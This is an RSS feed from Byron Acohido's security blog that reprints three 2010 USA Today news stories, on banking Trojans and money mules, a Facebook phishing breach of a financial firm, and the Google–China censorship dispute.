<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>The Last Watchdog &#187; USAToday stories</title>
	<atom:link href="http://lastwatchdog.com/category/usatoday-stories/feed/" rel="self" type="application/rss+xml" />
	<link>http://lastwatchdog.com</link>
	<description>on Internet security by Byron Acohido</description>
	<lastBuildDate>Thu, 02 Sep 2010 23:04:54 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=abc</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Banks require your help to keep online banking safe</title>
		<link>http://lastwatchdog.com/banks-require-consumers-online-banking-secure/</link>
		<comments>http://lastwatchdog.com/banks-require-consumers-online-banking-secure/#comments</comments>
		<pubDate>Fri, 30 Jul 2010 06:13:41 +0000</pubDate>
		<dc:creator>bacohido</dc:creator>
				<category><![CDATA[For consumers]]></category>
		<category><![CDATA[Imminent threats]]></category>
		<category><![CDATA[Top Stories]]></category>
		<category><![CDATA[USAToday stories]]></category>

		<guid isPermaLink="false">http://lastwatchdog.com/?p=6993</guid>
		<description><![CDATA[By Byron Acohido
Published July 30, 2010, USA TODAY print editions,  P1A
For generations, U.S. consumers have relied on banks to bear the primary responsibility for keeping their hard-earned cash deposits out of the hands of thieves. Now, banks want consumers to share the load.
About 80% of U.S. households have come to do their banking over the [...]]]></description>
			<content:encoded><![CDATA[<p><a rel="attachment wp-att-6994" href="http://lastwatchdog.com/banks-require-consumers-online-banking-secure/100730_online_banking_175px/"><img class="alignleft size-full wp-image-6994" title="100730_online_banking_175px" src="http://lastwatchdog.com/wp/wp-content/uploads/100730_online_banking_175px.jpg" alt="" width="175" height="161" /></a>By Byron Acohido</p>
<p><em>Published July 30, 2010, USA TODAY print editions,  <a href="http://www.usatoday.com/money/industries/banking/2010-07-29-online-banking-security_N.htm">P1A</a></em></p>
<p>For generations, U.S. consumers have relied on banks to bear the primary responsibility for keeping their hard-earned cash deposits out of the hands of thieves. Now, banks want consumers to share the load.</p>
<p>About 80% of U.S. households have come to do their banking over the Internet, banking consultancy Novantas says. Many consumers believe online banking is every bit as safe as branch banking. But that&#8217;s clearly not the case, banking and tech security specialists say.</p>
<p>Cyberattacks against individual online accounts have become so sophisticated and pervasive that the American Bankers Association (ABA) is now asking consumers to &#8220;partner&#8221; with banks to keep cyberrobbers in check.</p>
<p>The banking industry wants consumers to monitor their online accounts for unauthorized transactions on a &#8220;continuous, almost daily, basis,&#8221; says Doug Johnson, the ABA&#8217;s vice president of risk-management policy. That&#8217;s because PCs and smartphones have become &#8220;the online bank branch for a lot of individuals,&#8221; he says. &#8220;The customer needs to really recognize that security is most effective when they work in partnership with their financial institution.&#8221;</p>
<p>This shifting burden has come about because of developments that the banking industry did not anticipate a decade ago, when it began promoting personal computers as convenient venues for consumer banking. Ambitious online attacks soon followed. Banks have spent heavily to shore up cyberdefenses, and they&#8217;ve kept a policy of reimbursing individual online account holders who can verify that they&#8217;ve been ripped off, Johnson says.</p>
<p>Even so, cyberrobbery has evolved into a multifaceted, multibillion-dollar global industry that shows little sign of cooling. Last year, the number of malicious software programs designed to pilfer online bank accounts — referred to as banking Trojans — rose to 65,098 in December, up from 4,295 at the start of 2009, according to Panda Security, a Madrid-based antivirus software supplier.</p>
<p>Writers of malicious software code are prolific, always focusing on new ways to get past the latest defenses erected by banks and antivirus companies, says Panda Security researcher Sean-Paul Correll.</p>
<p>A 2009 ABA survey of 170 U.S. banks revealed that 85% of big banks are incurring losses stemming from cyberattacks on consumer online accounts. Banks responding to the survey rated the &#8220;threat level&#8221; of online attacks at 2.58 on a scale of zero to five; that&#8217;s up from a 1.84 rating in 2007.</p>
<p><a rel="attachment wp-att-6999" href="http://lastwatchdog.com/banks-require-consumers-online-banking-secure/100730_online_banking_chart450px/"><img class="alignleft size-full wp-image-6999" title="100730_online_banking_chart450px" src="http://lastwatchdog.com/wp/wp-content/uploads/100730_online_banking_chart450px.jpg" alt="" width="450" height="248" /></a></p>
<p>&#8220;Every single bank I&#8217;ve talked to in the last six months, big and small, has seen these attacks,&#8221; says Avivah Litan, banking security analyst at research firm Gartner. &#8220;It&#8217;s an arms race. There are solutions — until the next kind of attack comes along. And if you&#8217;re caught in the middle, you&#8217;re screwed.&#8221;</p>
<p><strong>Successful robbers are patient</strong></p>
<p>Janis Stuart, a retired San Diego personal trainer, barely dodged one recent cutting-edge attack. Returning from an out-of-town trip in April, Stuart booted up her desktop PC and began checking e-mail. She found a notice from her community bank advising her that all future e-mails would be sent to a new e-mail address, as per her online instructions. Stuart never requested such a change.</p>
<p>&#8220;My immediate reaction was that they had confused accounts, and this was a big mistake,&#8221; she recalls. Stuart drove down to the branch office. A clerk informed her that $5,836.66 was about to be transferred from her savings account to a woman Stuart had never heard of, in the form of a bill-payment check. Payment was stopped.</p>
<p>Stuart says bank officials advised her that she most likely had a computer infection that allowed an attacker to gain access to her account, change the e-mail address and set the bill payment in motion. The bank authorized the transfer because the thief knew the answers to Stuart&#8217;s &#8220;secret questions&#8221; — such as her mother&#8217;s maiden name and the city of her birth — and because a similar bill-payment check had been sent from Stuart&#8217;s account to the same woman 12 months earlier. That initial check was never cashed, Stuart says.</p>
<p>It was a ruse that allowed the attacker to remain undetected while establishing the woman as an approved recipient of bill-payment checks from Stuart. After waiting a year, the attacker triggered the second payment. &#8220;It was a fluke that I caught it in time before the money disappeared,&#8221; says Stuart. &#8220;I was very upset.&#8221; Stuart says she &#8220;felt the bank was somehow responsible&#8221; for enabling an intruder access to her account.</p>
<p>Stuart&#8217;s experience illustrates a prerequisite for accomplished cyberrobbers: patience. The cyberunderground has advanced to the point where very powerful hacking tools and tutorials are readily available for free, and a highly efficient and organized support infrastructure has been established to help thieves. Taking full advantage of such tools takes time.</p>
<p><strong>Chasing thieves&#8217; technology</strong></p>
<p>Instead of holding up a bank branch at gunpoint, modern-day cyberrobbers do their homework.</p>
<p>&#8220;To maximize their effectiveness and streamline their ability to move money quickly, criminals take the time to learn your online banking platform and do account reconnaissance,&#8221; says Terry Austin, CEO of Guardian Analytics, which supplies fraud-detection systems.</p>
<p>First, they acquire valid account log-ons, often by purchasing them from specialist data thieves. Next, they quietly access accounts, making note of high cash balances and access to credit lines. They also familiarize themselves with the bank&#8217;s protocols for authorizing the creation of new online accounts and approving cash transfers.</p>
<p>They look for coding security holes — and invariably find them in the Web browser, the tool banks rely on to run programs that serve as a virtual bank teller. But Internet Explorer, Firefox, Opera, Google Chrome and Apple Safari are designed to let users navigate the entire Internet; they weren&#8217;t meant to execute secure financial transactions. Cyberrobbers craft banking Trojans that inject software code into the Web browser, letting the attacker take control of online banking sessions, alter what the account holder sees and make stealthy transactions.</p>
<p>&#8220;With the exception of some rare cases, the current online banking systems are at least one full generation behind the current techniques employed by cybercrooks,&#8221; says Costin Raiu, Kaspersky Lab research director.</p>
<p>Cyberrobbers also take great care in setting up &#8220;drop&#8221; accounts — online accounts they control, usually at the same bank as victims — poised to receive cash transfers. They typically recruit &#8220;money mules,&#8221; accomplices who execute the final, riskiest step of withdrawing cash from drop accounts and forwarding proceeds to the ring leaders.</p>
<p>Mules are recruited through work-at-home advertisements on employment websites and, increasingly, on popular social networks. Typical pitches promise high earnings for minimal work involving accepting deposits and handling cash transfers. Kaspersky Lab researcher Dmitry Bestuzhev recently tracked down one Facebook-based mule recruiter who had 224,000 friends. &#8220;Who knows how many of them accepted the offer to be a money mule?&#8221; Bestuzhev says.</p>
<p>In one caper recently investigated by SecureWorks, the attacker embedded a banking Trojan in the victim&#8217;s Web browser by getting the person to click on a corrupted Web link in an instant message. The Trojan watched for when the victim next accessed his online bank account and sent a copy of the user name and password to the attacker. It also automatically injected a spoofed bank form into the legitimate banking Web pages.</p>
<p>The bank form asked for the last four digits of the user&#8217;s debit card number, ostensibly to complete a security update. The victim complied and filled out the form. The attacker now had a key piece of information necessary to execute large cash transfers.</p>
<p>On a Wednesday shortly before noon, the attacker logged on and began a series of transactions. He changed the e-mail address associated with the account, so notices of any questionable transfers wouldn&#8217;t reach the account holder. He next accessed a credit card line of credit and transferred the maximum loan amount into checking.</p>
<p>He then emptied the account of more than $20,000, via a series of transfers into a drop account. To execute the transfers, the thief had to answer this question: &#8220;What are the last four digits of your debit card account number?&#8221; It took four days for the bank to reimburse the victim.</p>
<p>Such attacks are likely to continue to be commonplace, says Joe Stewart, senior threat researcher at SecureWorks. &#8220;Cybercriminals can steal credentials for thousands of accounts at a time with very little effort,&#8221; he says. &#8220;They have access to more accounts than they could possibly ever use, and most of those are personal accounts.&#8221;</p>
<p><strong>Consumer distrust increases</strong></p>
<p>To slow down cyberrobberies, banks increasingly are asking &#8220;knowledge-based authentication&#8221; questions at key junctures of online banking sessions, says Johnson, the bankers association risk expert. Such questions, derived from data amassed by the big three credit bureaus, Experian, Equifax and TransUnion and by data aggregators LexisNexis and Axiom, ask about obscure personal details such as the name of one&#8217;s mortgage holder or father-in-law, a previous address, even the color of one&#8217;s car.</p>
<p>&#8220;The questions are going to get more difficult over time,&#8221; Johnson says. &#8220;The threat is real, and (banks) are providing the tools to help customers protect themselves.&#8221;</p>
<p>Citibank and Bank of America rank third and seventh among the top 10 most frequently attacked banks in the world, according to Kaspersky Lab. Each uses a variety of security systems and relies on consumers to help protect their online accounts.</p>
<p>&#8220;It is paramount that our customers know how to protect themselves,&#8221; says Bank of America spokeswoman Tara Burke. &#8220;We recommend that customers always protect their passwords, ensure the bank has up-to-date contact information and review their accounts on a regular basis.&#8221;</p>
<p>Litan, the Gartner banking security analyst, says banks need to move away from technologies that rely on common Web browsers, which is where banking Trojans thrive. Handheld optical readers, a more advanced technology, are available from Gemalto and Cronto. These devices must be used to take a picture of a visual cryptogram — a secure image produced by the bank — as part of authorizing any cash transfers.</p>
<p>Mandatory use of a verification device that operates separately from the browser would enable banks to ensure &#8220;secure transactions no matter what is on the customer&#8217;s PC,&#8221; says Paul Beverly, executive vice president at Gemalto.</p>
<p>But Litan says banks are a long way from even thinking about widely distributing such devices to consumers. &#8220;They don&#8217;t want to get into the business&#8221; of providing hardware to customers, she says.</p>
<p>Banking and security experts say the only thing that will change the banking industry&#8217;s current approach is widespread consumer backlash. Stuart&#8217;s reaction to her brush with a near robbery could be a harbinger. The experience prompted her to get offline and revert to branch banking.</p>
<p>&#8220;It&#8217;s inconvenient not to be able to check my account whenever I feel like it. I have to go by the bank and ask for printouts,&#8221; says Stuart. &#8220;But at this point, I distrust the system of online banking.&#8221;</p>
]]></content:encoded>
			<wfw:commentRss>http://lastwatchdog.com/banks-require-consumers-online-banking-secure/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How Facebook phishers breached a corporate network</title>
		<link>http://lastwatchdog.com/facebook-phishers-breached-corporate-network/</link>
		<comments>http://lastwatchdog.com/facebook-phishers-breached-corporate-network/#comments</comments>
		<pubDate>Thu, 04 Mar 2010 18:15:34 +0000</pubDate>
		<dc:creator>bacohido</dc:creator>
				<category><![CDATA[Imminent threats]]></category>
		<category><![CDATA[Top Stories]]></category>
		<category><![CDATA[USAToday stories]]></category>

		<guid isPermaLink="false">http://lastwatchdog.com/?p=4687</guid>
		<description><![CDATA[By Byron Acohido
USA TODAY  P. 1A  04Mar2010
SAN FRANCISCO &#8212; &#8220;Hey Alice, look at the pics I took of us last weekend at the picnic. Bob&#8221;
That Facebook message, sent last fall between co-workers at a large U.S. financial firm, rang true enough. Alice had, in fact, attended a picnic with Bob, who mentioned the outing [...]]]></description>
			<content:encoded><![CDATA[<p><a rel="attachment wp-att-4707" href="http://lastwatchdog.com/facebook-phishers-breached-corporate-network/socialnets_attacked280px-2/"><img class="alignleft size-full wp-image-4707" title="SocialNets_attacked280px" src="http://lastwatchdog.com/wp/wp-content/uploads/SocialNets_attacked280px1.jpg" alt="" width="280" height="352" /></a>By Byron Acohido</p>
<p>USA TODAY <a href="http://www.usatoday.com/tech/news/computersecurity/2010-03-04-1Anetsecurity04_CV_N.htm"> P. 1A </a> 04Mar2010</p>
<p>SAN FRANCISCO &#8212; &#8220;Hey Alice, look at the pics I took of us last weekend at the picnic. Bob&#8221;</p>
<p>That Facebook message, sent last fall between co-workers at a large U.S. financial firm, rang true enough. Alice had, in fact, attended a picnic with Bob, who mentioned the outing on his Facebook profile page.</p>
<p>So Alice clicked on the accompanying Web link, expecting to see Bob&#8217;s photos. But the message had come from thieves who had hijacked Bob&#8217;s Facebook account. And the link carried an infection. With a click of her mouse, Alice let the attackers usurp control of her Facebook account and company laptop. Later, they used Alice&#8217;s company logon to slip deep inside the financial firm&#8217;s network, where they roamed for weeks. They had managed to grab control of two servers, and were probing deeper, when they were detected.</p>
<p><em><strong>Sidebar: </strong><a href="http://lastwatchdog.com/koobface-evolved-stay-step/">How the Koobface worm is evolving to keep bad guys ahead</a></em></p>
<p>Intrusions like this one &#8212; investigated by network infrastructure provider Terremark &#8212; can expose a company to theft of its most sensitive data. Such attacks illustrate a dramatic shift underway in the Internet underground. Cybercriminals are moving aggressively to take advantage of an unanticipated chink in corporate defenses: the use of social networks in workplace settings. They are taking tricks honed in the spamming world and adapting them to what&#8217;s driving the growth of social networks: speed and openness of individuals communicating on the Internet.</p>
<p>&#8220;Social networks provide a rich repository of information cybercriminals can use to refine their phishing attacks,&#8221; says Chris Day, Terremark&#8217;s chief security architect.</p>
<p>This shift is gathering steam, tech security analysts say. One sign: The volume of spam and phishing scams &#8212; like the &#8220;LOL is this you?&#8221; viral messages sweeping through Twitter &#8212; more than doubled in the fourth quarter of 2009 compared with the same period in 2008, according to IBM&#8217;s X-Force security research team. Such &#8220;phishing&#8221; lures &#8212; designed to trick you into clicking on an infectious Web link &#8212; are flooding e-mail inboxes, as well as social-network messages and postings, at unprecedented levels.</p>
<p>An infected PC, referred to as a &#8220;bot,&#8221; gets slotted into a network of thousands of other bots. These &#8220;botnets&#8221; then are directed to execute all forms of cybercrime, from petty scams to cyberespionage. On Tuesday, authorities in Spain announced the breakup of a massive botnet, called Mariposa, comprising more than 12 million infected PCs in 190 countries.</p>
<p>Three Spanish citizens with no prior criminal records were arrested. Panda Security, of Bilbao, Spain, helped track down the alleged ringleader, who authorities say has been spreading infected links for about a year, mainly via Microsoft&#8217;s free MSN instant messenger service.</p>
<p>&#8220;It became too big and too noticeable,&#8221; says Pedro Bustamante, senior researcher at Panda Security. &#8220;They would have been smarter to stay under the radar.&#8221;</p>
<p>What happened to Bob and Alice, the picnickers at the financial firm, illustrates how social networks help facilitate targeted attacks. As a rule, tech-security firms investigate breaches under non-disclosure agreements. Honoring such a policy, Terremark used pseudonyms for the affected employees in supplying USA TODAY with details of what happened at the financial institution.</p>
<p>Investigators increasingly find large botnets running inside corporate networks, where they can be particularly difficult to root out or disable. &#8220;Social networks represent a vehicle to distribute malicious programs in ways that are not easily blocked,&#8221; says Tom Cross, IBM X-Force Manager.</p>
<p><strong>Koobface gold mine</strong></p>
<p>The attacks run the gamut. In just four weeks earlier this year, one band of low-level cyberthieves, known in security circles as the Kneber gang, pilfered 68,000 account logons from 2,411 companies, including user names and passwords for 3,644 Facebook accounts. Active since late 2008, the Kneber gang has probably cracked into &#8220;a much higher number&#8221; of companies, says Tim Belcher, CTO of security firm NetWitness, which rooted out one of the gang&#8217;s storage computers.</p>
<p>&#8220;Every network we see today has a significant problem with some form of organized threat,&#8221; Belcher says. The Kneber gang &#8220;happened to focus on collecting as many network-access credentials as possible.&#8221;</p>
<p>Stolen credentials flow into eBay-like hacking forums where a batch of 1,000 Facebook user name and password pairs, guaranteed valid, sells for $75 to $200, depending on the number of friends tied to the accounts, says Sean-Paul Correll, researcher at Panda Security. From each account, cyberscammers can scoop up e-mail addresses, contact lists, birth dates, hometowns, mothers&#8217; maiden names, photos and recent gossip &#8212; all useful for targeting specific victims and turning his or her PC into an obedient bot, Correll says.</p>
<p>On the high end, the Koobface worm, initially set loose 19 months ago, continues to increase in sophistication as it spreads through Facebook, Twitter, MySpace and other social networks. At its peak last August, more than 1 million Koobface-infected PCs inside North American companies were taking instructions from criminal controllers to carry out typical botnet criminal activities, says Gunter Ollmann, vice president of research at security firm Damballa.</p>
<p>In another measure of Koobface&#8217;s ubiquity, Kaspersky Labs estimates that there are 500,000 Koobface-controlled PCs active on the Internet on an average day, 40% of which are in the U.S., 15% in Germany and the rest scattered through 31 other nations. &#8220;The personal information employees post day-by-day on Facebook is turning out to be a real gold mine,&#8221; says Stefan Tanase, a Kaspersky Lab senior researcher.</p>
<p>Facebook, the dominant social network, with 400 million members and therefore the biggest target, says recent partnerships with Microsoft and security firm McAfee to filter malicious programs help keep compromised accounts to a small percentage. &#8220;We are constantly working to improve complex systems that quickly detect and block suspicious activity, delete malicious links, and help people restore access to their accounts,&#8221; says spokesman Simon Axten.</p>
<p>Still, social networks have grown popular because they foster open communication among friends and acquaintances, which plays into the bad guys&#8217; hands, says Eva Chen, CEO of anti-virus firm Trend Micro.</p>
<p>&#8220;These new communication platforms are where people go, so that&#8217;s where the hackers are going,&#8221; Chen says.</p>
<p>Meanwhile, discussions about restricting workplace use of social networks and training employees to be more circumspect are just beginning to percolate at venues like the big tech security trade show here this week sponsored by RSA, the security division of EMC. &#8220;Most larger businesses simply ask employees to watch their time spent on social-networking sites,&#8221; says Ollmann.</p>
<p><strong>A noisy attack</strong></p>
<p>Each infected PC in a corporate network represents a potential path to valuable intellectual property, such as customer lists, patents or strategic documents. That&#8217;s what the attackers who breached Google and 30 other tech, media, defense and financial companies in January were after. Those attacks &#8212; referred to in security circles as Operation Aurora &#8212; very likely were initiated by faked friendly messages sent to specific senior employees at the targeted companies, says George Kurtz, McAfee&#8217;s chief technology officer.</p>
<p>The attack on the picnicking co-workers at the financial firm illustrates how targeted attacks work. Last fall, attackers somehow got access to Bob&#8217;s Facebook account, logged into it, grabbed his contact list of 50 to 60 friends and began manually reviewing messages and postings on his profile page. Noting discussions about a recent picnic, the attackers next sent individual messages, purporting to carry a link to picnic photos, to about a dozen of Bob&#8217;s closest Facebook friends, including Alice. The link in each message led to a malicious executable file, a small computer program.</p>
<p>Upon clicking on the bad file, Alice unknowingly downloaded a rudimentary keystroke logger, a program designed to save everything she typed at her keyboard and, once an hour, send a text file of her keystrokes to a free Gmail account controlled by the attacker. The keystroke logger was of a type that is widely available for free on the Internet.</p>
<p>The attackers reviewed the hourly keystroke reports from Alice&#8217;s laptop and took note when she logged into a virtual private network account to access her company&#8217;s network. With her username and password, the attackers logged on to the financial firm&#8217;s network and roamed around it for two weeks.</p>
<p>First they ran a program, called a port scan, to map out key network connection points. Next they systematically scanned all of the company&#8217;s computer servers looking for any that were not current on Windows security patches. Companies often leave servers unpatched, relying on perimeter firewalls to keep intruders at bay. The attackers eventually found a vulnerable server, and breached it, gaining a foothold to go deeper.</p>
<p>A short time later, the attackers were discovered and cut off. One of Bob&#8217;s Facebook friends mentioned to Bob that the picnic photos he had sent had failed to render. That raised suspicions. A technician took a closer look at daily logs of data traffic on the company&#8217;s network and spotted the vulnerability scans.</p>
<p>Terremark&#8217;s Day says two or three collaborators, each with different skill sets, most likely worked together to pull off the attack. &#8220;They were noisy about how they went about this,&#8221; says Day. &#8220;Had they been quieter they would&#8217;ve gotten much further.&#8221;</p>
]]></content:encoded>
			<wfw:commentRss>http://lastwatchdog.com/facebook-phishers-breached-corporate-network/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Google-China affair shows how China does business</title>
		<link>http://lastwatchdog.com/google-china-affair-shows-china-oes-business/</link>
		<comments>http://lastwatchdog.com/google-china-affair-shows-china-oes-business/#comments</comments>
		<pubDate>Mon, 25 Jan 2010 17:11:32 +0000</pubDate>
		<dc:creator>bacohido</dc:creator>
				<category><![CDATA[Top Stories]]></category>
		<category><![CDATA[USAToday stories]]></category>

		<guid isPermaLink="false">http://lastwatchdog.com/?p=4466</guid>
		<description><![CDATA[USA TODAY
25Jan2010
By Byron Acohido, Calum MacLeod and Kathy Chu
Original online posting here.
BEIJING — Zhang Nanting enjoys text messaging acquaintances while he&#8217;s at the Golden Fortune Internet café here. Lately, the 28-year-old insurance salesman has been meticulous about keeping his texts squeaky clean.
&#8220;I rarely send rude, short messages,&#8221; says Zhang, citing the government&#8217;s recent crackdown on [...]]]></description>
			<content:encoded><![CDATA[<p><a rel="attachment wp-att-4468" href="http://lastwatchdog.com/google-china-affair-shows-china-oes-business/howchinadoes_250px/"><img class="alignleft size-full wp-image-4468" title="HowChinaDoes_250px" src="http://lastwatchdog.com/wp/wp-content/uploads/HowChinaDoes_250px.jpg" alt="" width="250" height="333" /></a>USA TODAY</p>
<p>25Jan2010</p>
<p>By Byron Acohido, Calum MacLeod and Kathy Chu</p>
<p><em>Original online posting <a href="http://www.usatoday.com/tech/news/2010-01-23-googlechina25_cv_N.htm">here</a>.</em></p>
<p>BEIJING — Zhang Nanting enjoys text messaging acquaintances while he&#8217;s at the Golden Fortune Internet café here. Lately, the 28-year-old insurance salesman has been meticulous about keeping his texts squeaky clean.</p>
<p>&#8220;I rarely send rude, short messages,&#8221; says Zhang, citing the government&#8217;s recent crackdown on pornographic texting. &#8220;I think it&#8217;s excessive management, as I don&#8217;t know how they judge what is dirty or not.&#8221;</p>
<p>Zhang, like most Chinese citizens and most multinational companies doing business in China, grudgingly accepts government surveillance and censorship as a way of life. But things may be changing.</p>
<p>Google&#8217;s (GOOG) recent threat to pull out of China has brought into sharp relief China&#8217;s longstanding clampdown on personal freedoms and foreign companies&#8217; access to its vast consumer market. It has continued these practices even as it revs up the capitalist-style advance of the world&#8217;s fastest-growing economy.</p>
<p>In China, domestic &#8220;stability&#8221; is paramount. That means zero tolerance for political dissent at a time when Chinese consumers are being encouraged to embrace technologies that let them communicate and socialize much like their Western counterparts. Similarly, China has invited major tech players, such as Google, Microsoft and Yahoo, to help nurture its economic growth. Yet it imposes censorship and other restrictions and has paid little heed to intellectual-property rights.</p>
<p>Analysts say this is all part of China&#8217;s drive to develop — and become the dominant supplier to — the world&#8217;s most populous consumer-driven economy, with information technology as a major component. &#8220;The government in China is determined to exercise some control over mass media and the Internet,&#8221; says Harvard law professor Jonathan Zittrain. &#8220;The aim is to keep the average Internet user pointed away from controversial content and towards approved content.&#8221;</p>
<p>Until Google dug its heels in, China Inc. seemed to have all the cards stacked in its favor. On Jan. 11, the search giant issued a statement complaining about invasive cyberattacks and demanding that China back off on censorship of Google&#8217;s search results. &#8220;This is the first time a big company like Google has stood up and said, &#8216;I have had enough of this,&#8217; &#8221; says Hu Yong, a Beijing-based new-media expert.</p>
<p>China hasn&#8217;t budged — and no one expects it to. Doing business in China has never been easy. Foreign-owned companies face a thicket of censorship, trade restrictions and tariffs, says Oded Shenkar, a business management professor at Ohio State University and author of The Chinese Century.</p>
<p>What&#8217;s more — not unlike many other nations engaged in multinational commerce — China uses the Internet for industrial spying, says Jody Westby, CEO of consulting firm Global Cyber Risk.</p>
<p>China &#8220;lies in a class by itself&#8221; in the &#8220;scope and scale of its cyberespionage operations,&#8221; says Usha Haley, analyst at the Economic Policy Institute and co-author of The Chinese Tao of Business.</p>
<p>Multinational tech companies, in particular, bemoan China&#8217;s insistence on controlling encryption protocols that companies use to protect sensitive data. It withholds certifications until companies conform, gaining control of the decryption codes for everyone doing business within its borders, says Shenkar.</p>
<p>The sum of this approach: China&#8217;s economy is roaring. Its Bureau of Statistics reported gross domestic product, the key measure of a nation&#8217;s growth, rose 10.7% in the fourth quarter and 8.7% overall in 2009. Its banking sector issued $1.2 trillion in new loans last year. By the end of October, China held $798.9 billion in U.S. Treasury notes, making the U.S. its biggest borrower.</p>
<p>Yet the growth comes as reforms that arose from the government&#8217;s 30-year &#8220;opening up&#8221; campaign are stalling out, says Joerg Wuttke, president of the European Union Chamber of Commerce in China. A September 2009 chamber report recounts a three-year rise in &#8220;industrial-policy interventions.&#8221; It found protectionism woven into standardization policies on products from cellphones to medical equipment, subjective enforcement of environmental rules favoring Chinese firms, and intellectual-property theft becoming a major concern.</p>
<p>In this backdrop, Google&#8217;s push-back could coalesce a broader shift in sentiment already underway. Many companies sense that access to Chinese markets is actually shrinking, Wuttke says. &#8220;The investment atmosphere has shifted,&#8221; he says. &#8220;It&#8217;s an indication that foreign companies are struggling.&#8221;</p>
<p>That&#8217;s because &#8220;China doesn&#8217;t believe in survival of the fittest. It believes in &#8216;survival of whomever we say survives,&#8217; &#8221; says Anthony Migyanka, an economist and managing partner at Texas-based Mobile Money Minute.</p>
<p><strong>Energizing activists</strong></p>
<p><a rel="attachment wp-att-4485" href="http://lastwatchdog.com/google-china-affair-shows-china-oes-business/100125_clinton_450px/"><img class="alignleft size-full wp-image-4485" title="100125_Clinton_450px" src="http://lastwatchdog.com/wp/wp-content/uploads/100125_Clinton_450px.jpg" alt="" width="450" height="199" /></a>But China may be reaching the limits to that approach. On Thursday, Secretary of State Hillary Rodham Clinton proposed policies to quell censorship and ingrain freedom of expression on the Internet as a global standard. Clinton called on China to be transparent about responding to Google. She also threw down a gauntlet for U.S. corporations. &#8220;Censorship should not be in any way accepted by any company from anywhere,&#8221; said Clinton. &#8220;This needs to be part of our national brand.&#8221;</p>
<p>The Beijing-based Xinhua News Agency on Friday issued an official response. Chinese Foreign Ministry spokesman Ma Zhaoxu called on the United States to &#8220;respect facts and stop unreasonable accusations on China in the name of so-called Internet freedom.&#8221;</p>
<p>Clinton&#8217;s speech energized privacy and human rights activists, who&#8217;ve been tilting with Internet censors and hackers in China, Vietnam, Iran, North Korea and Tunisia. Clinton pledged $15 million to support &#8220;Internet freedom&#8221; projects, including helping non-profit organizations plot &#8220;circumvention strategies.&#8221;</p>
<p>&#8220;New technology demands new thinking about how companies and governments can each work to protect freedom,&#8221; says Elisa Massimino, CEO of Human Rights First.</p>
<p>China&#8217;s leaders aren&#8217;t completely immune to criticism. But for China, nothing counts more than domestic stability, which government leaders achieve by squelching dissent. Go along and you&#8217;re left alone to consume like a Westerner; resist and pay the consequences.</p>
<p>For the past six months, China has sent a vast region, larger than Alaska, back to the pre-Internet age. Last week, residents of Xinjiang, the nation&#8217;s Muslim northwest, were permitted to send text messages again. But international telephone calls are limited, and Internet use remains heavily restricted, after ethnic riots in July.</p>
<p>Such actions remind Chinese citizens who is in control. Underground, in the dimly lit Golden Fortune Internet cafe and pool bar in Beijing&#8217;s Chongwen District, Zhang must register his ID card before logging on to one of 80 computers. Then he faces the &#8220;Great Firewall of China,&#8221; an array of official censorship tools designed to curb his surfing.</p>
<p>&#8220;Of course I wish I could read whatever I want,&#8221; he says, but he rarely bothers &#8220;climbing the wall&#8221; to bypass the censor&#8217;s blocks. &#8220;It&#8217;s too complicated.&#8221;</p>
<p><strong>Playing along</strong></p>
<p><a rel="attachment wp-att-4486" href="http://lastwatchdog.com/google-china-affair-shows-china-oes-business/steveballmer_whitehouse90px/"><img class="alignleft size-full wp-image-4486" title="SteveBallmer_whitehouse90px" src="http://lastwatchdog.com/wp/wp-content/uploads/SteveBallmer_whitehouse90px.jpg" alt="" width="90" height="122" /></a>Historically, tech giants Microsoft, Yahoo and even Google have played along to get along in China. To gain approval to launch google.cn and open a high-rise office in Beijing in 2006, the search giant accepted censorship of search queries and results, such as references to the Tiananmen Square massacre. In a speech to Houston oil executives on Thursday, Microsoft CEO Steve Ballmer said that Microsoft intends to obey China&#8217;s specific censorship requests just as it follows laws in every country.</p>
<p>Yahoo has done that, too. The portal company infamously forked over data to Chinese officials that in 2004 helped convict journalist Shi Tao for leaking a propaganda directive. Shi was sent to prison for 10 years.</p>
<p>The kowtowing hasn&#8217;t exactly paid huge dividends. Yahoo sold its China business in 2005 to Chinese company Alibaba, giving up day-to-day management of its China operations. Yahoo retained a 39% stake in Alibaba.</p>
<p>Microsoft in 2002 began investing $750 million to help seed an indigenous Chinese tech sector, including opening a major research-and-development center in Shanghai. But the software giant has no illusions about dominating the Chinese PC software market, says Matt Rosoff, tech industry analyst at Directions on Microsoft. Windows PCs already are widely used in China, but 90% run pirated copies of Windows, says Rosoff.</p>
<p>Microsoft figures investing in the maturation of the Chinese tech industry will help drive down the piracy rate. Over time, Microsoft hopes, millions of Chinese will begin paying for their copy of Windows, Rosoff says.</p>
<p>For its part, Google has quickly become a mainstay with young professionals. It has a 20% share of the Chinese search market compared with search leader Baidu&#8217;s 70%, according to China IntelliConsulting.</p>
<p>Chinese tech firms, such as Baidu, &#8220;are extremely scrappy,&#8221; says Kaiser Kuo, a Beijing-based tech consultant. &#8220;They&#8217;ve managed to get the notoriously frugal Chinese consumer to part with money.&#8221;</p>
<p>Whether Google leaves China or stays remains to be seen. &#8220;The environment in which we are operating in terms of an open Internet is not improving in China,&#8221; says David Drummond, Google&#8217;s chief legal officer. &#8220;We&#8217;re no longer comfortable censoring our search results in China, and we are reviewing the feasibility of our operations there.&#8221;</p>
<p>Noting Google&#8217;s respect for the Chinese people, Drummond said it will keep a Chinese-language option on its global service if it shuts down google.cn.</p>
<p>Meanwhile, James McGregor, a Beijing-based consultant at APCO Worldwide, says complaints about mounting restrictions — he describes it as a lot of &#8220;little things at every level &#8230; by every ministry&#8221; — are reaching a crescendo. He says there is a high level of &#8220;clandestine support&#8221; for Google in the multinational business community. Google&#8217;s protest &#8220;has the possibility of stirring up a lot of people here who depend on Google and don&#8217;t want to lose it,&#8221; says McGregor.</p>
